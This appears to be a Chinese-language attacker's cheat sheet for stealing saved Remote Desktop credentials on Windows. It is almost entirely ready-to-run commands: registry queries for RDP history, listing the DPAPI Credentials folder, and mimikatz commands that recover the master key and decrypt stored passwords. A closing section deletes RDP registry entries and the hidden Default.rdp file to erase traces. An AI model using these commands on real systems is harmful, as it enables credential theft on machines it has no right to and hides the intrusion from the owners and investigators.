通过注册表查看历史记录
reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\Servers" /s
通过本地Credentials
读取记录
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
使用mimikatz读取密码(需要保存过凭证的才可以)
mimikatz dpapi::cred /in:C:\Users\xxxx\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6
通过获取到的guidMasterKey
来寻找MasterKey
mimikatz privilege::debug sekurlsa::dpapi
红色和上面的对应
masterkey下面要用到
mimikatz # dpapi::cred /in:C:\Users\xxx\AppData\Local\Microsoft\Credentials\EE1A4100890230A55C3C07FF6747BBF5 /masterkey:8f6e4ad433937955a7ee7d309798d08a44f1ea3c44b15725d37f834493644257e2f99c556e0fb1e81243c878168dc2dbe59a1310f189c90f67962ebf3072cfdb
日志清除
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f # 删除Default中的所有值
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f # 删除整个Servers
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" 重新创建删除的注册表项
cd %userprofile%\documents\ # 转到Default.rdp文件目录
attrib Default.rdp -s -h # 更改Default.rdp文件属性,默认情况下它是隐藏
del Default.rdp # 删除文件Default.rdp文件
参考文章
https://blog.csdn.net/q1352483315/article/details/100075078